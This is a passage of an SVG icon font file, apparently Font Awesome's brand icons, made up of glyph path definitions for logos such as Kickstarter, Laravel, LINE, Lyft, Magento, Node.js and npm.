c-12 -11.2998 -30.9004 -10.8994 -42.4004 1.10059c-6.7002 7 -9.39941 16.7998 -7.59961 26.2998c-24.9004 26.5996 -44.4004 47.2002 -44.4004 47.2002c42.7002 34.0996 63.2998 79.5996 64.4004 124.2c0.700195 28.8994 -7.2002 57.1992 -21.1006 82.1992zM104 394.9
c6.7002 -7 9.40039 -16.8008 7.59961 -26.3008l45.9004 -48.0996c-4.7002 -3.7998 -13.2998 -10.4004 -22.7998 -21.2998c-25.4004 -28.5 -39.6006 -64.7998 -40.7002 -102.9c-0.700195 -28.8994 6.09961 -57.2002 20 -82.3994l-22 -21.5
c-19.2998 31.5996 -28.9004 67.6992 -27.7998 104.699c1 44.6006 18.2998 87.6006 47.5 121.101l-25.2998 26.3994c-9.60059 -1.2998 -19.2002 2 -25.9004 9.10059c-11.2998 12 -10.9004 30.8994 1.09961 42.3994c11.9004 11.2002 30.6006 10.9004 42.4004 -1.19922z
M464.9 440c26 0 47.0996 -22.4004 47.0996 -48.2998c0 -25.9004 -21.0996 -47.7002 -47.0996 -47.7002c-6.30078 -0.0996094 -14 1.09961 -15.9004 1.7998l-62.9004 -59.7002c-32.6992 43.6006 -76.6992 65.9004 -126.899 67.2002
c-30.5 0.700195 -60.2998 -6.7998 -86.2002 -22.3994l-21.0996 22c32.1992 20.7998 69.5996 31.0996 108.1 30.1992c43.2998 -1.09961 84.5996 -16.6992 117.7 -44.5996l41.0996 38.5996c-1.5 4.7002 -2.2002 9.60059 -2.2002 14.5
c-0.0996094 26.7002 22.3008 48.4004 48.3008 48.4004zM256.7 334.6c5.5 0 10.8994 -0.399414 16.3994 -1.09961c78.1006 -9.7998 133.4 -81.0996 123.801 -159.1c-9.80078 -78.1006 -81.1006 -133.4 -159.101 -123.801c-78.0996 9.80078 -133.399 81.1006 -123.8 159.2
c9.2998 72.4004 70.0996 124.601 142.7 124.8zM197.7 215.2c0.599609 -22.7002 12.2002 -41.7998 32.3994 -52.2002l-11 -51.7002h73.7002l-11 51.7002c20.1006 10.9004 32.1006 29 32.4004 52.2002c-0.400391 32.7998 -25.7998 57.5 -58.2998 58.2998
c-32.1006 -0.799805 -57.3008 -24.7998 -58.2002 -58.2998zM256 288z" />
    <glyph glyph-name="kickstarter" unicode="&#xf3bb;" 
d="M400 -32h-352c-26.4004 0 -48 21.5996 -48 48v352c0 26.4004 21.5996 48 48 48h352c26.4004 0 48 -21.5996 48 -48v-352c0 -26.4004 -21.5996 -48 -48 -48zM199.6 269.5c0 30.7002 -17.5996 45.0996 -39.6992 45.0996c-25.8008 0 -40 -19.7998 -40 -44.5v-154.8
c0 -25.7998 13.6992 -45.5996 40.5 -45.5996c21.5 0 39.1992 14 39.1992 45.5996v41.7998l60.6006 -75.6992c12.2998 -14.9004 39 -16.8008 55.7998 0c14.5996 15.0996 14.7998 36.7998 4 50.3994l-49.0996 62.7998l40.5 58.7002c9.39941 13.5 9.5 34.5 -5.60059 49.1006
c-16.3994 15.8994 -44.5996 17.2998 -61.3994 -7l-44.8008 -64.7002v38.7998z" />
    <glyph glyph-name="kickstarter-k" unicode="&#xf3bc;" horiz-adv-x="384" 
d="M147.3 333.6v-70.5996l82.7998 118.2c31.2002 44.3994 83.3008 41.7998 113.601 12.7998c27.8994 -26.7002 27.7998 -65.0996 10.3994 -89.7998l-74.8994 -107.4l90.7998 -114.8c19.9004 -24.7998 19.5996 -64.5996 -7.40039 -92.2002
c-31.0996 -30.7002 -80.5 -27.2002 -103.199 0l-112.101 138.3v-76.5c0 -57.7998 -32.5996 -83.3994 -72.3994 -83.3994c-49.6006 0 -74.9004 36.0996 -74.9004 83.3994v283c0 45.2002 26.2002 81.4004 73.9004 81.4004c40.8994 0 73.3994 -26.2002 73.3994 -82.4004z" />
    <glyph glyph-name="laravel" unicode="&#xf3bd;" horiz-adv-x="640" 
d="M637.5 206.4c4.2998 -4.80078 3.2002 -8.60059 -4.7002 -10.6006c-6.7002 -1.89941 -69.5996 -18.5996 -87.2998 -23.2998c25.7998 -34.5996 75.0996 -100.6 79.2998 -106.8c5.7002 -8.5 0.5 -10.9004 -7.89941 -14.4004c-8.40039 -3.39941 -195.2 -70.5996 -208 -74.5
c-16.3008 -5 -23.7002 -7.5 -34.3008 7.40039c-8 11.0996 -51.0996 88.7002 -72.1992 127c-40 -10.5 -113.2 -29.6006 -134.301 -34.7002c-20.5996 -5 -29.3994 7.40039 -32.7998 15c-3.39941 7.59961 -124.8 269.2 -132.399 287.2c-7.60059 18 0.799805 21.3994 8.39941 22
c7.60059 0.700195 114.5 9.59961 128.5 10.2002c14 0.699219 15.2998 -2.5 21.4004 -11.6006l154.2 -257.5l193.699 46.4004c-10.7998 15.2002 -59.5 84.2998 -64.1992 90.8994c-5.30078 7.40039 0.0996094 10.8008 8.69922 12.3008
c8.60059 1.39941 82.7002 13.8994 89.1006 14.7998c6.2998 0.899414 11.3994 3.09961 21.7002 -9.2998c10.2998 -12.4004 68.8994 -85.7002 73.0996 -90.5zM285.3 134.4c2.2998 0.5 3.7998 1.7998 1.2002 6.09961c-2.40039 4.2998 -144.6 249.7 -144.6 249.7
c-1.30078 2.2002 -0.900391 3 -4.5 2.7998c-3.5 -0.200195 -104.301 -9.2002 -106 -9.2002c-1.7002 0 -1.80078 -2.59961 0 -5.89941c1.7998 -3.30078 130.1 -268 130.8 -270s0.700195 -2.60059 6.5 -1.30078c5.7998 1.30078 114.3 27.3008 116.6 27.8008zM591.3 77
c-1.7002 2.7002 -61.2002 83.4004 -64.0996 88.2002c-3 4.7002 -4.5 3.7002 -9.2002 2.2002l-188.8 -49.1006s58 -100.3 62.3994 -106.8c4.40039 -6.5 7.10059 -6 10.6006 -4.5c3.39941 1.5 181.7 61.5996 187.1 63.5996c5.5 1.90039 3.7002 3.7002 2 6.40039zM603.4 211.1
c4.19922 1 7.39941 2.40039 5.59961 4.7002c-1.90039 2.40039 -50.9004 64.5 -54.5 69.4004c-3.59961 4.89941 -6.09961 4.09961 -9 3.39941c-2.90039 -0.599609 -67.2998 -12.2998 -71.2998 -12.7998s-2.7002 -2.7002 -1.10059 -5l56.7002 -77.7998
s69.4004 17.2002 73.6006 18.0996z" />
    <glyph glyph-name="line" unicode="&#xf3c0;" 
d="M272.1 243.8v-71.0996c0 -1.7998 -1.39941 -3.2002 -3.19922 -3.2002h-11.4004c-1.09961 0 -2.09961 0.599609 -2.59961 1.2998l-32.6006 44v-42.2002c0 -1.7998 -1.39941 -3.19922 -3.2002 -3.19922h-11.3994c-1.7998 0 -3.2002 1.39941 -3.2002 3.19922v71.1006
c0 1.7998 1.40039 3.2002 3.2002 3.2002h11.2998c1 0 2.09961 -0.5 2.59961 -1.40039l32.6006 -44v42.2002c0 1.7998 1.39941 3.2002 3.2002 3.2002h11.3994c1.7998 0.0996094 3.2998 -1.40039 3.2998 -3.10059zM190.1 247c1.80078 0 3.2002 -1.5 3.2002 -3.2002v-71.0996
c0 -1.7998 -1.39941 -3.2002 -3.2002 -3.2002h-11.3994c-1.7998 0 -3.2002 1.40039 -3.2002 3.2002v71.0996c0 1.7998 1.40039 3.2002 3.2002 3.2002h11.3994zM162.6 187.4c1.7002 0 3.10059 -1.5 3.10059 -3.2002v-11.4004c0 -1.7998 -1.40039 -3.2002 -3.2002 -3.2002
h-45.7002c-0.899414 0 -1.59961 0.400391 -2.2002 0.900391c-0.599609 0.599609 -0.899414 1.2998 -0.899414 2.2002v71.0996c0 1.7998 1.39941 3.2002 3.2002 3.2002h11.3994c1.7998 0 3.2002 -1.40039 3.2002 -3.2002v-56.3994h31.0996zM332.1 247
c1.7002 0 3.10059 -1.5 3.2002 -3.2002v-11.3994c0 -1.80078 -1.39941 -3.2002 -3.2002 -3.2002h-31.0996v-12h31.0996c1.80078 0 3.2002 -1.40039 3.2002 -3.2002v-11.5c0 -1.7998 -1.39941 -3.2002 -3.2002 -3.2002h-31.0996v-12h31.0996
c1.80078 0 3.2002 -1.39941 3.2002 -3.2002v-11.3994c0 -1.7998 -1.39941 -3.2002 -3.2002 -3.2002h-45.6992c-1.80078 0 -3.2002 1.5 -3.2002 3.2002v71.0996c0 1.7998 1.5 3.2002 3.2002 3.2002h45.6992zM448 334.3v-285.3
c-0.0996094 -44.7998 -36.7998 -81.0996 -81.7002 -81h-285.3c-44.7998 0.0996094 -81.0996 36.9004 -81 81.7002v285.3c0.0996094 44.7998 36.9004 81.0996 81.7002 81h285.3c44.7998 -0.0996094 81.0996 -36.7998 81 -81.7002zM386.4 211.7
c0 73 -73.2002 132.399 -163.101 132.399c-89.8994 0 -163.1 -59.3994 -163.1 -132.399c0 -65.4004 58 -120.2 136.399 -130.601c19.1006 -4.09961 16.9004 -11.0996 12.6006 -36.7998c-0.700195 -4.09961 -3.2998 -16.0996 14.0996 -8.7998
c17.4004 7.2998 93.9004 55.2998 128.2 94.7002c23.5996 26 34.9004 52.2998 34.9004 81.5z" />
    <glyph glyph-name="lyft" unicode="&#xf3c3;" horiz-adv-x="512" 
d="M0 366.9h77.7998v-208.7c0 -33.1006 15 -52.7998 27.2002 -61c-12.7002 -11.1006 -51.2002 -20.9004 -80.2002 2.7998c-17 14 -24.7998 37.2998 -24.7998 59v207.9zM485.9 193.4c0 -14.2002 11.5996 -25.9004 26.0996 -25.9004v-76.5
c-56.7002 0 -102.7 46.0996 -102.7 102.7v77.0996c0 34.6006 -52.2002 34.6006 -52.2002 0v-23.2998h38.8008v-76.7998h-38.8008v-6.7002c0 -21.7998 -7.69922 -45 -24.7998 -59c-16.2998 -13.7002 -35.7002 -16.2998 -51.7002 -14v179.2
c0 56.7002 46.1006 102.7 102.7 102.7c49.1006 0 90.2002 -34.4004 100.3 -80.7002h26.1006v-76.7998h-23.7998v-22zM191.6 292.4v0.5h77.1006v-178.2c0 -52.4004 -29.7002 -91.7002 -76.7998 -100.8c-26.1006 -5.10059 -52.5 -2.80078 -77.6006 4.69922v70.3008
c9.7998 -4.2002 29.5 -9.40039 45 -7.80078c20.4004 2 32.7998 11.9004 34.9004 25.3008c0 0 -21.2002 -20.4004 -58.2002 -10.6006c-37 9.90039 -45 40.1006 -45 63.9004v132.7h76.7998v-113c0 -15.4004 23.7998 -15.4004 23.7998 0v113z" />
    <glyph glyph-name="magento" unicode="&#xf3c4;" 
d="M445.7 320.1v-256.1l-63.4004 -36.5v255.8l-158.5 91.6006l-158.6 -91.6006l0.399414 -255.899l-63.2998 36.5996v255.9l221.9 128.1zM255.6 27.5v255.9l63.4004 -36.6006v-256l-95.0996 -54.8994l-94.9004 54.8994l-0.0996094 255.9l63.2998 36.5996v-256
l31.7998 -18.2002z" />
    <glyph glyph-name="medapps" unicode="&#xf3c6;" horiz-adv-x="320" 
d="M118.3 209.6c3.5 12.5 6.90039 33.6006 13.2002 33.6006c8.2998 -1.7998 9.59961 -23.4004 18.5996 -36.6006c4.60059 23.5 5.30078 85.1006 14.1006 86.7002c9 0.700195 19.7002 -66.5 22 -77.5c9.89941 -4.09961 48.8994 -6.59961 48.8994 -6.59961
c1.90039 -7.2998 -24 -7.60059 -40 -7.7998c-4.59961 -14.8008 -5.39941 -27.7002 -11.3994 -28c-4.7002 -0.200195 -8.2002 28.7998 -17.5 49.5996l-9.40039 -65.5c-4.39941 -13 -15.5 22.5 -21.8994 39.2998c-3.30078 0.100586 -62.4004 1.60059 -47.6006 7.7998zM228 0
h-136c-21.2002 0 -21.2002 32 0 32h136c21.2002 0 21.2002 -32 0 -32zM204 -64h-88c-21.2002 0 -21.2002 32 0 32h88c21.2002 0 21.2002 -32 0 -32zM238.2 77.5c-3.60059 -21.2998 -36 -15.5 -32.6006 5.09961c3.60059 21.2002 5.60059 40.6006 15.3008 58.6006
c32.5996 60.2998 66.0996 95.5 66.0996 151.6c0 67.9004 -57 123.2 -127 123.2s-127 -55.2998 -127 -123.2c0 -56.0996 33.5 -91.2998 66.0996 -151.7c9.7002 -17.8994 11.7002 -36.8994 15.3008 -58.5996c3.5 -20.7998 -29.1006 -26.0996 -32.6006 -5.09961
c-3.2002 19.0996 -5.2002 36.3994 -11.8994 48.8994c-8 14.7002 -16.1006 28.1006 -24 41c-24.6006 40.4004 -45.9004 75.2998 -45.9004 125.5c0 85.6006 71.7998 155.2 160 155.2s160 -69.5996 160 -155.2c0 -50.2998 -21.2998 -85.0996 -45.9004 -125.5
c-7.89941 -12.8994 -16.0996 -26.2998 -24 -41c-6.69922 -12.3994 -8.69922 -29.8994 -11.8994 -48.7998z" />
    <glyph glyph-name="medium-m" unicode="&#xf3c7;" horiz-adv-x="512" 
d="M71.5 305.7c0.599609 5.89941 -1.7002 11.7998 -6.09961 15.7998l-45.1006 54.4004v8.09961h140.2l108.4 -237.7l95.2998 237.7h133.7v-8.09961l-38.6006 -37c-3.2998 -2.5 -5 -6.7002 -4.2998 -10.8008v-272c-0.700195 -4.09961 1 -8.2998 4.2998 -10.7998l37.7002 -37
v-8.09961h-189.7v8.09961l39.1006 37.9004c3.7998 3.7998 3.7998 5 3.7998 10.7998v219.8l-108.7 -275.899h-14.7002l-126.399 275.899v-184.899c-1.10059 -7.80078 1.5 -15.6006 7 -21.2002l50.7998 -61.6006v-8.09961h-144v8l50.7998 61.7002
c5.40039 5.59961 7.90039 13.5 6.5 21.2002v213.8z" />
    <glyph glyph-name="medrt" unicode="&#xf3c8;" horiz-adv-x="544" 
d="M113.7 192c0 -121.8 83.8994 -222.8 193.5 -241.1c-18.7002 -4.5 -38.2002 -6.90039 -58.2002 -6.90039c-137.6 0 -249 111 -249 248s111.4 248 248.9 248c20.0996 0 39.5996 -2.40039 58.1992 -6.90039c-109.6 -18.2998 -193.399 -119.3 -193.399 -241.1zM411.1 91.7002
c77.7002 55.3994 104.4 155.1 67 233.899c11.2002 -9.89941 21.5 -21.2998 30.5 -34.1992c61.6006 -88.3008 40.8008 -210.301 -46.5 -272.601c-87.2998 -62.2998 -208.1 -41.2002 -269.699 47c-9 12.7998 -16.2002 26.4004 -21.7002 40.5
c60.7998 -62.0996 162.7 -70 240.399 -14.5996zM192.3 335.7c72.5 54.5996 171.601 45.7002 221.601 -19.7998c45.2998 -59.7002 34.3994 -145.601 -22.3008 -201.801c18.5 51.4004 11.3008 111 -24.3994 158c-43 56.5 -114.601 78.3008 -178.9 60.5
c1.2998 1 2.60059 2.10059 4 3.10059zM296 224h40c4.40039 0 8 -3.59961 8 -8v-48c0 -4.40039 -3.59961 -8 -8 -8h-40c-4.40039 0 -8 -3.59961 -8 -8v-40c0 -4.40039 -3.59961 -8 -8 -8h-48c-4.40039 0 -8 3.59961 -8 8v40c0 4.40039 -3.59961 8 -8 8h-40
c-4.40039 0 -8 3.59961 -8 8v48c0 4.40039 3.59961 8 8 8h40c4.40039 0 8 3.59961 8 8v40c0 4.40039 3.59961 8 8 8h48c4.40039 0 8 -3.59961 8 -8v-40c0 -4.40039 3.59961 -8 8 -8z" />
    <glyph glyph-name="microsoft" unicode="&#xf3ca;" 
d="M0 416h214.6v-214.6h-214.6v214.6zM233.4 416h214.6v-214.6h-214.6v214.6zM0 182.6h214.6v-214.6h-214.6v214.6zM233.4 182.6h214.6v-214.6h-214.6v214.6z" />
    <glyph glyph-name="mix" unicode="&#xf3cb;" 
d="M0 384h448v-204.1c0 -56.6006 -88 -59.9004 -88 0v23.7998c0 56.7998 -82.7002 59 -88 4.2998v-116.1c0 -58 -96 -57.9004 -96 0v175.3c0 56.8994 -80.0996 59.3994 -88 6.5v-238.601c0 -58.0996 -88 -56.1992 -88 0v348.9z" />
    <glyph glyph-name="mizuni" unicode="&#xf3cc;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111.1 248 -248c0 -137 -111 -248 -248 -248s-248 111 -248 248c0 136.9 111 248 248 248zM168 88.0996v223.9c0 22.0996 -17.9004 40 -40 40s-40 -17.9004 -40 -40v-272.1c21.2002 20.8994 48.5996 37.5996 80 48.1992zM288 98v214
c0 22.0996 -17.9004 40 -40 40s-40 -17.9004 -40 -40v-214c13 2 26.4004 3.09961 40.2002 3.09961c13.5996 0 26.8994 -1.09961 39.7998 -3.09961zM408 40.2998v271.7c0 22.0996 -17.9004 40 -40 40s-40 -17.9004 -40 -40v-223.7c31.4004 -10.5996 58.7998 -27.2002 80 -48z
" />
    <glyph glyph-name="monero" unicode="&#xf3d0;" horiz-adv-x="496" 
d="M352 64h108.4c-43.4004 -71.9004 -122.301 -120 -212.4 -120s-169 48.0996 -212.4 120h108.4v127.8l104 -104.8l104 105v-128zM88 112h-74.7998c-8.60059 25.0996 -13.2002 52 -13.2002 80c0 137 111 248 248 248s248 -111 248 -248c0 -28 -4.7002 -54.9004 -13.2002 -80
h-74.7998v208l-160.6 -159.4l-159.4 159.4v-208z" />
    <glyph glyph-name="napster" unicode="&#xf3d2;" horiz-adv-x="495" 
d="M298.3 74.4004c-14.2002 -13.6006 -31.2998 -24.1006 -50.3994 -30.5c-19 6.39941 -36.2002 16.8994 -50.3008 30.5h100.7zM342.3 274c-56.3994 39.7998 -132.1 39.9004 -188.899 -0.0996094c-19.9004 16.7998 -43.6006 29.5 -69.5 36.3994v-161.6
c0 -217.3 328 -219.101 328 0.299805v161.2c-26 -7 -49.6006 -19.2998 -69.6006 -36.2002zM133.5 332.5c6.5 -3.2002 14.0996 -7.40039 20.4004 -11.4004c58.6992 30.5 129.199 30.6006 187.899 0.100586c6.7002 4.2002 13.5 8 20.6006 11.5
c-64.6006 59.8994 -164.5 59.7998 -228.9 -0.200195zM43.7998 354.8c17.5 -0.5 34.2998 -3.09961 50.6006 -7.5c82 91.6006 225.5 91.6006 307.5 0.100586c16.0996 4.39941 32.7998 6.89941 50.0996 7.39941v-69.2002c58.7002 -36.5 58.5 -121.899 -0.200195 -158.199
l-0.299805 -1.7002c-25.9004 -238.8 -381.2 -243.601 -407.6 1.5c-58.5 37.2002 -58.5 121.8 -0.100586 158.3v69.2998zM259.2 96c13.0996 59.2998 33.5 56 113 55.4004c-0.799805 -8.2002 0.0996094 -32.3008 -26.2002 -47.4004c-4.40039 -2.5 -15.2998 -6 -25.5 -6.5
c-25.2998 -1.2002 -61.2998 -1.5 -61.2998 -1.5zM123.7 151.3c79.2998 0.700195 99.7998 4 113 -55.3994c0 0 -36 0.399414 -61.2998 1.5c-10.3008 0.5 -21.1006 4 -25.5 6.5c-26.3008 15.0996 -25.4004 39.1992 -26.2002 47.3994zM292.8 27.9004
c3 -4.90039 3.2002 -8.80078 3.2998 -8.90039c-29.0996 -17.5996 -67.0996 -17.5996 -96.1992 0c0 0 0.899414 5.5 3.69922 9.59961c3.5 5.10059 6.40039 6.60059 6.40039 6.60059c23.7002 -6.90039 51.0996 -7.2998 75.9004 0c0 0 3.69922 -2 6.89941 -7.2998z" />
    <glyph glyph-name="node-js" unicode="&#xf3d3;" 
d="M224 -60c-6.7002 0 -13.5 1.7998 -19.4004 5.2002l-61.6992 36.5c-9.2002 5.2002 -4.7002 7 -1.7002 8c12.2998 4.2998 14.7998 5.2002 27.8994 12.7002c1.40039 0.799805 3.2002 0.5 4.60059 -0.400391l47.3994 -28.0996c1.7002 -1 4.10059 -1 5.7002 0l184.7 106.6
c1.7002 1 2.7998 3 2.7998 5v213.2c0 2.09961 -1.09961 4 -2.89941 5.09961l-184.601 106.5c-1.7002 1 -4 1 -5.7002 0l-184.5 -106.6c-1.7998 -1 -2.89941 -3 -2.89941 -5.10059v-213.1c0 -2 1.09961 -4 2.89941 -4.90039l50.6006 -29.1992
c27.5 -13.7002 44.2998 2.39941 44.2998 18.6992v210.4c0 3 2.40039 5.2998 5.40039 5.2998h23.3994c2.90039 0 5.40039 -2.2998 5.40039 -5.2998v-210.5c0 -36.5996 -20 -57.5996 -54.7002 -57.5996c-10.7002 0 -19.0996 0 -42.5 11.5996l-48.4004 27.9004
c-12 6.89941 -19.3994 19.7998 -19.3994 33.6992v213.101c0 13.7998 7.39941 26.7998 19.3994 33.7002l184.5 106.6c11.7002 6.59961 27.2002 6.59961 38.8008 0l184.699 -106.7c12 -6.89941 19.4004 -19.7998 19.4004 -33.7002v-213.1
c0 -13.7998 -7.40039 -26.7002 -19.4004 -33.7002l-184.699 -106.6c-5.90039 -3.40039 -12.6006 -5.2002 -19.4004 -5.2002zM373.1 150.1c0 -40.1992 -33.5996 -63.2998 -92 -63.3994c-80.8994 0 -97.7998 37.0996 -97.7998 68.2002c0 2.89941 2.2998 5.2998 5.2998 5.2998
h23.9004c2.7002 0 4.90039 -1.90039 5.2998 -4.5c3.60059 -24.2998 14.2998 -36.6006 63.2002 -36.6006c38.9004 0 55.5 8.80078 55.5 29.4004c0 11.9004 -4.7002 20.7998 -65.2002 26.7002c-50.5 5 -81.7998 16.2002 -81.7998 56.5996c0 37.2998 31.4004 59.5 84.0996 59.5
c59.2002 0 88.5 -20.5 92.2002 -64.5996c0.100586 -1.5 -0.399414 -3 -1.39941 -4.10059c-1 -1.09961 -2.40039 -1.69922 -3.90039 -1.69922h-24c-2.5 0 -4.7002 1.7998 -5.2002 4.19922c-5.7998 25.6006 -19.7998 33.8008 -57.7002 33.8008
c-42.5 0 -47.3994 -14.8008 -47.3994 -25.9004c0 -13.4004 5.7998 -17.2998 63.2002 -24.9004c56.6992 -7.5 83.6992 -18.0996 83.6992 -58z" />
    <glyph glyph-name="npm" unicode="&#xf3d4;" horiz-adv-x="576" 
d="M288 160h-32v64h32v-64zM576 288v-192h-288v-32h-128v32h-160v192h576zM160 256h-128v-128h64v96h32v-96h32v128zM320 256h-128v-160h64v32h64v128zM544 256h-192v-128h64v96h32v-96h32v96h32v-96h32v128z" />
    <glyph glyph-name="ns8" unicode="&#xf3d5;" horiz-adv-x="639" 
d="M187.1 288.1h44.9004l-48.5 -160.1h-56.9004l-50.5996 106.5l-31.0996 -106.5h-44.9004l49 160.1h49.4004l54.5 -113.699zM639.6 289c4.60059 -28.5996 -36.0996 -44.7002 -65.6992 -50.5996h-0.100586c17.5 -29.3008 22.1006 -69.3008 3.40039 -105.5
c-26.4004 -51.2002 -86.5 -79.9004 -135.101 -68c-29.3994 7.19922 -51.3994 29 -56.7998 59.5c-0.700195 3.5 -1 7.09961 -1.2002 10.7998c-5.5 -2.7998 -11.8994 -4.2002 -18.5 -4.90039c-15.5996 -1.7002 -21 -2.2998 -160.899 -2.2998l11.5996 39.5h126.8
c9.10059 0 12.2002 3.2002 13.8008 7.40039c1.69922 4.59961 3.39941 10.1992 4.5 14.5996c1.09961 3.90039 0.0996094 6.59961 -7.7002 6.59961h-87.2998c-33.4004 0 -38.2002 9.2002 -32.8008 28.6006c3.2002 11.5 10.8008 37.2002 17.6006 47.0996
c7.09961 10.2002 18.2998 13.7002 30.5996 15c15.6006 1.7002 20.4004 1.2002 160.101 1.2002l-9.7002 -31.5h-133.5c-5.5 0 -11.2002 -0.700195 -13.2998 -7.09961c-1.80078 -5.40039 -2.10059 -6.7002 -3.7002 -12.2002c-1.40039 -5.10059 2.2002 -7.40039 11.5 -7.40039
h87.5996c20.4004 0 31 -6.7998 34 -16.5996c19.9004 21.3994 50.4004 39.5 94.2002 48.2002v0.0996094c-13.4004 42.5 43.9004 66.5996 88.5 58.7998c18.2002 -3.2002 39.2002 -13.2998 42.0996 -31.2998zM530.7 184.3c3.09961 15.7998 -0.5 33.7002 -7.2002 47.7998
c-23.2998 -2.89941 -52.2998 -10.0996 -68.5 -26.8994c-24.4004 -25.2998 -16.7998 -60 14.0996 -64.7998c25 -3.90039 55.7002 14.3994 61.6006 43.8994zM552.5 267.4c10.5996 1.5 23.5 3.5 34.2002 9.59961c14.7998 8.5 10.3994 21 -4.90039 24.4004
c-10.8994 2.39941 -25.0996 -0.5 -31.7998 -7.7002c-7.2998 -7.7998 -1.7002 -20.2998 2.5 -26.2998z" />
    <glyph glyph-name="nutritionix" unicode="&#xf3d6;" horiz-adv-x="400" 
d="M88 439.9c0 0 133.4 8.19922 121 -104.4c0 0 19.0996 74.9004 103 40.5996c0 0 -17.7002 -74 -88 -56c0 0 14.5996 54.6006 66.0996 56.6006c0 0 -39.8994 10.2998 -82.0996 -48.7998c0 0 -19.7998 94.5 -93.5996 99.6992c0 0 75.1992 -19.3994 77.5996 -107.5
c0 -0.0996094 -106.4 -7 -104 119.801zM400 124.3c0 -48.5 -9.7002 -95.2998 -32 -132.3c-42.2002 -30.9004 -105 -48 -168 -48c-62.9004 0 -125.8 17.0996 -168 48c-22.2998 37 -32 83.7998 -32 132.3c0 48.4004 17.7002 94.7002 40 131.7
c42.2002 30.9004 97.0996 48.5996 160 48.5996c63 0 117.8 -17.5996 160 -48.5996c22.2998 -37 40 -83.2998 40 -131.7zM120 20c0 15.5 -12.5 28 -28 28s-28 -12.5 -28 -28s12.5 -28 28 -28s28 12.5 28 28zM120 86.2002c0 15.5 -12.5 28 -28 28s-28 -12.5 -28 -28
s12.5 -28 28 -28s28 12.5 28 28zM120 152.4c0 15.5 -12.5 28 -28 28s-28 -12.5 -28 -28s12.5 -28 28 -28s28 12.5 28 28zM192 20c0 15.5 -12.5 28 -28 28s-28 -12.5 -28 -28s12.5 -28 28 -28s28 12.5 28 28zM192 86.2002c0 15.5 -12.5 28 -28 28s-28 -12.5 -28 -28
s12.5 -28 28 -28s28 12.5 28 28zM192 152.4c0 15.5 -12.5 28 -28 28s-28 -12.5 -28 -28s12.5 -28 28 -28s28 12.5 28 28zM264 20c0 15.5 -12.5 28 -28 28s-28 -12.5 -28 -28s12.5 -28 28 -28s28 12.5 28 28zM264 86.2002c0 15.5 -12.5 28 -28 28s-28 -12.5 -28 -28
s12.5 -28 28 -28s28 12.5 28 28zM264 152.4c0 15.5 -12.5 28 -28 28s-28 -12.5 -28 -28s12.5 -28 28 -28s28 12.5 28 28zM336 20c0 15.5 -12.5 28 -28 28s-28 -12.5 -28 -28s12.5 -28 28 -28s28 12.5 28 28zM336 86.2002c0 15.5 -12.5 28 -28 28s-28 -12.5 -28 -28
s12.5 -28 28 -28s28 12.5 28 28zM336 152.4c0 15.5 -12.5 28 -28 28s-28 -12.5 -28 -28s12.5 -28 28 -28s28 12.5 28 28zM360 192c-4.7998 22.2998 -7.40039 36.9004 -16 56c-38.7998 19.9004 -90.5 32 -144 32s-105.2 -12.0996 -144 -32
c-8.7998 -19.5 -11.2002 -33.9004 -16 -56c42.2002 7.90039 98.7002 14.7998 160 14.7998s117.8 -6.89941 160 -14.7998z" />
    <glyph glyph-name="page4" unicode="&#xf3d7;" horiz-adv-x="496" 
d="M248 -56c-137 0 -248 111 -248 248s111 248 248 248c20.9004 0 41.2998 -2.59961 60.7002 -7.5l-266.4 -376.5h205.7v-112zM248 87.5996h-149.4l149.4 213.601v-213.601zM344 56h111.4c-26.9004 -41 -65.7002 -73.5 -111.4 -92.7002v92.7002zM401.4 194.2v-16.7002
l-21.2002 8.2998zM381.1 139.7c5.90039 0 8.2002 -4.7002 8.2002 -10.6006v-10h-16.2002v7.7002c0 6.60059 1.30078 12.9004 8 12.9004zM496 192c0 -37.2998 -8.2002 -72.7002 -23 -104.4h-129v333.101c89.2998 -37.5 152 -125.8 152 -228.7zM360.4 304.4h68.1992v47.5996
h-13.8994v-32.5996h-13.9004v29.5996h-13.8994v-29.5996h-12.7002v32.5996h-13.9004v-47.5996h0.100586zM428.5 119.1h-26.5v11c0 15.4004 -5.59961 25.2002 -20.9004 25.2002c-15.3994 0 -20.6992 -10.5996 -20.6992 -25.8994v-25.3008h68.1992v15h-0.0996094zM428.5 222.1
l-68.2002 -29.6992v-12.4004l68.2002 -29.5v16.5996l-14.4004 5.7002v26.5l14.4004 5.90039v16.8994zM423.7 290.6h-35.6006v-26.5996h13.9004v12.2002h11c8.59961 -15.7998 1.2998 -35.2998 -18.5996 -35.2998c-22.5 0 -28.3008 25.2998 -15.5 37.6992l-11.6006 10.6006
c-16.2002 -17.5 -12.2002 -63.9004 27.1006 -63.9004c34 0 44.6992 35.9004 29.2998 65.2998z" />
    <glyph glyph-name="palfed" unicode="&#xf3d8;" horiz-adv-x="575" 
d="M384.9 254.1c0.0996094 -53.3994 -46.5 -96.1992 -83.3008 -96.1992c-12.5 0 -14.3994 3.39941 -15.0996 6.19922c0.5 39.1006 1.7002 80.4004 3 119.801c40.2002 14.3994 95.4004 17.5996 95.4004 -29.8008zM190.4 181.9
c-0.200195 0.599609 -0.400391 2.09961 -0.600586 4.59961c0 25.5996 37 60.9004 58.5 75.9004c-1.2002 -36.4004 -5.5 -198.101 -1.39941 -242.5c3 -32.3008 26.7998 -32.9004 36.3994 -22.3008c5.90039 6.60059 5.5 15.7002 5.2998 19.1006v0.200195
c-1.7998 25.5996 -2.7998 60.5996 -2.69922 100c60.7998 -14.4004 140.1 60.2998 140.1 138.199c0 71 -63 94.2002 -135.2 72c-2.89941 14.6006 -18.2998 20.1006 -29.5 11.1006c-7.5 -6.2002 -9.5 -15.7998 -10.5 -28.2002c-57.7998 -30.9004 -100.7 -84.5 -100.7 -126.5
c0 -24.9004 15.6006 -43 37.1006 -43c35.0996 0 41 44.0996 14.3994 44.0996c-4.69922 0 -11 -2.69922 -11.1992 -2.69922zM8 266.9c0 38.5996 38.4004 37.3994 38.4004 37.3994h29c15.5 70.1006 120.5 74.2998 120.5 74.2998h28.0996v19.1006
c0 18.3994 21.0996 18.3994 21.0996 18.3994h85.8008c18.3994 0 21.0996 -18.3994 21.0996 -18.3994v-19.1006h28c89.2002 0 112.1 -48.6992 119.4 -74.2998h30.0996c38.5 0 38.4004 -37.3994 38.4004 -37.3994c0 -38.6006 -38.4004 -37.4004 -38.4004 -37.4004h-30
